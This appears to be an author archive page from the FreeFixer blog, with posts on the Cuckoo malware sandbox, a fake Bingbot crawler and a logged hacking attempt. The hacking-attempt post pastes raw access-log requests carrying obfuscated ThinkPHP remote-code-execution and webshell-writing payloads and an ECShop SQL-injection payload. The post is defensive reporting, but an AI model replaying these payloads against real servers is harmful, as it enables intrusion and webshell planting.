About Roger Karlsson Roger Karlsson

Roger Karlsson is the programmer of the FreeFixer tool and the guy that posts on the FreeFixer blog.

Find more about me on:

Here are my most recent posts

All posts by Roger Karlsson

About Roger Karlsson

Roger Karlsson is the programmer of the FreeFixer tool and the guy that posts on the FreeFixer blog.

Say Hi To Cuckoo Sandbox!

Cuckoo is an open source automated malware analysis tool. Cuckoo can execute files and monitor the behaviour. And if you are running FreeFixer, your suspicious files will also be analysed by the sandbox. For free.

I’ll try to explain what Cuckoo can do more in detail by using examples from the Cuckoo reports on files listed here at freefixer.com:

One of the most useful features is that Cuckoo can trace API calls. Here’s an example from RunBoosterUpdateTask64.exe, where you can see that it calls CreateServiceW to register a driver named WinDivert64.sys. This is pretty useful if you are trying to find out what a particular file on your system is doing.

"call": {
  "category": "services",
  "status": 1,
  "stacktrace": [],
  "api": "CreateServiceW",
  "return_value": 4536928,
  "arguments": {
    "service_start_name": "",
    "start_type": 2,
    "service_handle": "0x0000000000453a60",
    "display_name": "WinDivert1.2",
    "error_control": 1,
    "service_name": "WinDivert1.2",
    "filepath": "C:\\Windows\\System32\\drivers\\WinDivert64.sys",
    "filepath_r": "C:\\Windows\\system32\\drivers\\WinDivert64.sys",
    "service_manager_handle": "0x0000000000453a00",
    "desired_access": 983551,
    "service_type": 1,
    "password": ""
  },
  "time": 1576385586.79675,
  "tid": 2436,
  "flags": {}
}

Cuckoo also monitors host resolving. Here’s another example from the log where RunBoosterUpdateTask64.exe tries to get the IP address for update.updinfo.xyz:

"resolves_host": [ "update.updinfo.xyz" ]

And the list goes on. Cuckoo detects anti-virtualisation tactics. For example, Cuckoo will notice if the file under test checks for existence of VMware/VirtualBox registry keys or files.

Here’s an example from armsvc.exe where Cuckoo notice that the process is trying to detect if it is running in VMware using an instruction:

{
  "markcount": 1,
  "families": [],
  "description": "Detects VMWare through the in instruction feature",
  "severity": 3,
...

Cuckoo will detect potential compressed or encrypted data in the executable files by measuring the entropy in the file. Cuckoo can also step through installation wizards and takes screenshots during the analysis. It will also log UDP and TCP connection.

I’m impressed by all the features.

So, I’ve set up a Cuckoo installation that freefixer.com will use to analyse files. The approach is simple. Freefixer.com will upload files to sandbox and after a while the analysis will be displayed on the web site. I’ve decided to display the Summary, Generic, Dropped, Signatures, Yara, and Network sections from the sandbox report. Here’s an example report for armsvc.exe:

I’ve been running Cuckoo for some time now, and it has analysed more that 6000 files. I’m pretty happy with the result so far. Cuckoo just keeps on running, analysing one file after another.

I’ve identified a number of issues that needs to be addressed:

  • Lots of noise! The reports from Cuckoo can be quite verbose and it can be difficult for users to identify the most interesting parts of the log. This is pretty difficult problem that I’m not sure how to fix. An automated approach is needed to pinpoint the most interesting parts of the log.
  • Identical screenshots. The sandbox generates screenshots that are almost identical. I’m currently using ImageMagick to compare images for similarity but it does not work good enough. I think the code needs another round of tuning.
  • The web site needs to explain what the items in the log means. For example, what does UPD packets sent from the local host to 224.0.0.255 at port 5355 mean? (It’s a name resolution for hosts on the same local link)
  • The JSON reports are shown in fixed size text-areas (<pre></pre>) with vertical and horizontal scrollbars. Works OK when the amount of JSON data is small. Works terrible when dealing with large amount of data. Please let me know if you have some ideas on how to present the JSON data in smart ways.

I’m hoping, now that you have another tool to analyse files, that this will help you to track down and remove that malware running on your machine.

50.116.69.213 – Bingbot at Bluehost?

For the last week I’ve been trying to get rid of various type of bad behaving bots visiting Freefixer.com. I have a small python script that will flag suspicious bingbots. The script detected 50.116.69.213:

50.116.69.213 - - [10/Sep/2019:20:43:53 -0700] "GET /freefixer.xml HTTP/1.1" 200 9808 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

As you can see, when I do a reverse IP lookup for 50.116.69.213 the returned hostname ends with .bluehost.com. 50.116.69.213 is clearly not a real Bingbot.

Typically I would block anyone falsely claiming to be a Bingbot. But given that it only polls FreeFixer XML PAD, it’s possible that 50.116.69.213 is running a software listing site. Setting the user agent to Bingbot could just be sloppy programming error. I will not block 50.116.69.213.

50.116.69.213 is located in Houston:

124.156.120.3 – Another Hacking Attempt

Found another hacking attempt this morning when examining the access.log. I’ve pasted the requests from 124.156.120.3 below. It appears attempt to inject some PHP and SQL code. In addition 124.156.120.3 also identify itself as Bingbot, which obviously is not true.

124.156.120.3 seems to be assigned to Singapore Tencent Cloud Computing (beijing) Co. Ltd. It’s likely one of their customers that have been hacked. Here’s the location on a Google map:

124.156.120.3 - - [17/Sep/2019:14:08:53 -0700] "PUT //QqYN1A763TmozH0L.txt HTTP/1.1" 404 4221 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[KxVHuP17U239lQyI]);{//../rss HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:56 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7350 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=53USa9rmzg916cmW.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:58 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:59 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27f*ck%27]);&f*ck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "POST //index.php?s=index HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //d.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

